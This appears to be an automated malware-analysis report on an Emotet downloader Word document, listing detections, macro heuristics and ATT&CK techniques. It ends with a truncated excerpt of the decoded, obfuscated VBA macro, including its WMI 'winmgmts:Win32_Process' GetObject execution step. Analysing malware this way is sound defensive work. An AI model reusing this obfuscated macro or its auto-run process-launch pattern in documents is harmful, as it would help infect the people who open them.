Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865934-0', strongly suggesting the Emotet family. Heuristics indicate the presence of a legacy WordBasic auto-exec macro ('autoopen') and a VBA 'GetObject' call, which is commonly used to download and execute additional malicious content. The VBA script itself is heavily obfuscated, but the combination of auto-execution and the GetObject call points to downloader functionality.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6865934-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6865934-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41268 bytes |

SHA-256 of macros.bas: a79f6054d5c0d65eb02a252f083ad7f1964106a1ecf501cfaa621e60bfb6bc2e
Preview script: first 1,000 lines of the extracted script (obfuscated sample code, shown as extracted; the two `winmgmts:` string fragments and the `GetObject` call are the parts the heuristics above flag)

```vb
Attribute VB_Name = "a7880266"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "C840010"
Function s3148_()
Select Case R1566_
Case 516838731
m__285 = (j87807_8 * Fix(296178247 / CBool(o115_1))) - C13_37 / Oct(293393407) / 630377197 + CStr(I_558_23) - 660671192 + ChrB(X_19883)
End Select
Select Case p93_382
Case 77420656
i48054 = (Y1644314 * Fix(774667045 / CBool(f4349_))) - I52_120 / Oct(529354408) / 90262237 + CStr(i8450_) - 168691378 + ChrB(z___5_3)
End Select
Select Case u__60_8_
Case 30235116
U409_695 = (B490_4 * Fix(19556864 / CBool(Q392_258))) - D6_5_622 / Oct(728609941) / 106099904 + CStr(z70__30) - 733617483 + ChrB(i408_2_)
End Select
Select Case k670_6_
Case 647821167
i24_71 = (X8_800_4 * Fix(896535262 / CBool(J3__73))) - V__123 / Oct(319038763) / 336902251 + CStr(r21_55) - 571729712 + ChrB(n__87_)
End Select
Select Case O7_7_331
Case 162329689
I2_353 = (k_1_4_ * Fix(2283938 / CBool(J83_2_1_))) - H27426 / Oct(305651347) / 118717102 + CStr(d0_86__) - 272478045 + ChrB(h_06_988)
End Select
Select Case U_41__7
Case 698753536
k3_6382_ = (W_51400 * Fix(453048743 / CBool(v__89_06))) - X72467 / Oct(196484666) / 810741272 + CStr(f147387) - 282946352 + ChrB(K1____)
End Select
Select Case a__00_9
Case 203337892
j3921__ = (z__67_ * Fix(454390916 / CBool(p16_064))) - u18_5__ / Oct(268298586) / 543508811 + CStr(n57302_0) - 563238546 + ChrB(N91652_8)
End Select
End Function
Function l0_1__(o7_572_, Q__632__)
On Error Resume Next
Select Case M1__0_9
Case 49615010
M_7_311 = (H_4_28 * Fix(988689433 / CBool(K30484))) - T_88_99 / Oct(149282066) / 503026093 + CStr(z619690) - 592631230 + ChrB(m3087_)
End Select
Select Case Z678_9
Case 19993843
i_7952 = (k3_3_9 * Fix(413919346 / CBool(j73___))) - t2_0_168 / Oct(96083708) / 331985542 + CStr(n322_88_) - 917373509 + ChrB(D58_898_)
End Select
i253_50_ = X159_269 + "winmgmts:Win32" + s47661 + "_ProcessStartup" + M2_65_
Select Case i6_9945
Case 675298117
u34_959 = (k__5_51 * Fix(652825974 / CBool(v0140_))) - P_621_ / Oct(880846215) / 835072291 + CStr(l273__8) - 597682159 + ChrB(F59946)
End Select
Select Case P_3_4642
Case 723758910
E7__3_ = (d3_128 * Fix(150904099 / CBool(M36__0))) - o3886_ / Oct(513302008) / 694092139 + CStr(C_2854) - 619347939 + ChrB(b_24291)
End Select
Select Case I0____46
Case 678729379
m_15_35 = (j8306_ * Fix(580591602 / CBool(H1746_49))) - a517_148 / Oct(393622825) / 977817913 + CStr(f365085) - 465139037 + ChrB(X680_8)
End Select
j40_1__ = F965_0 + "winmgmts:Win32" + j373_5 + "_Process" + O_25_51
Select Case a608888_
Case 943495683
U_26_315 = (q08380_ * Fix(822252679 / CBool(V970_9_9))) - z818_45 / Oct(27061879) / 974788942 + CStr(M780_25) - 962437839 + ChrB(C__8_87)
End Select
Select Case z__1660
Case 777063855
z3984_3 = (P_4___ * Fix(598179275 / CBool(f59545))) - V065_8_ / Oct(106471359) / 909233529 + CStr(K_5125_) - 551170688 + ChrB(r2_693)
End Select
Select Case C_90_4_
Case 813565636
f52_22_ = (F33_2_2_ * Fix(76797393 / CBool(b__26043))) - Y03_138_ / Oct(284062389) / 174184373 + CStr(R_4__8) - 929465842 + ChrB(h272_51)
End Select
Set S04___ = GetObject(W57640 + i253_50_ + Q6___63)
Select Case D_25324
Case 657663429
Z_82793 = (G1__06 * Fix(120492041 / CBool(O__069))) - N_7299_ / Oct(382100021) / 960712356 + CStr(Q1660__5) - 226287301 + ChrB(w242699)
End Select
Select Case M_58__9
Case 933067159
C4_6_21 = (s_48_9 * Fix(795652300 / CBool(s868_0))) - H373770 / Oct(781117956) / 934453172 + CStr(V9_34__) - 791343344 + ChrB(X__991)
End Select
Select Case D59_03_
Case 539910223
Y361266 = (i_02_1_ * Fix(321892653 / CBool(F27__66))) - d6_176_7 / Oct(155155024) / 366
... (truncated)
```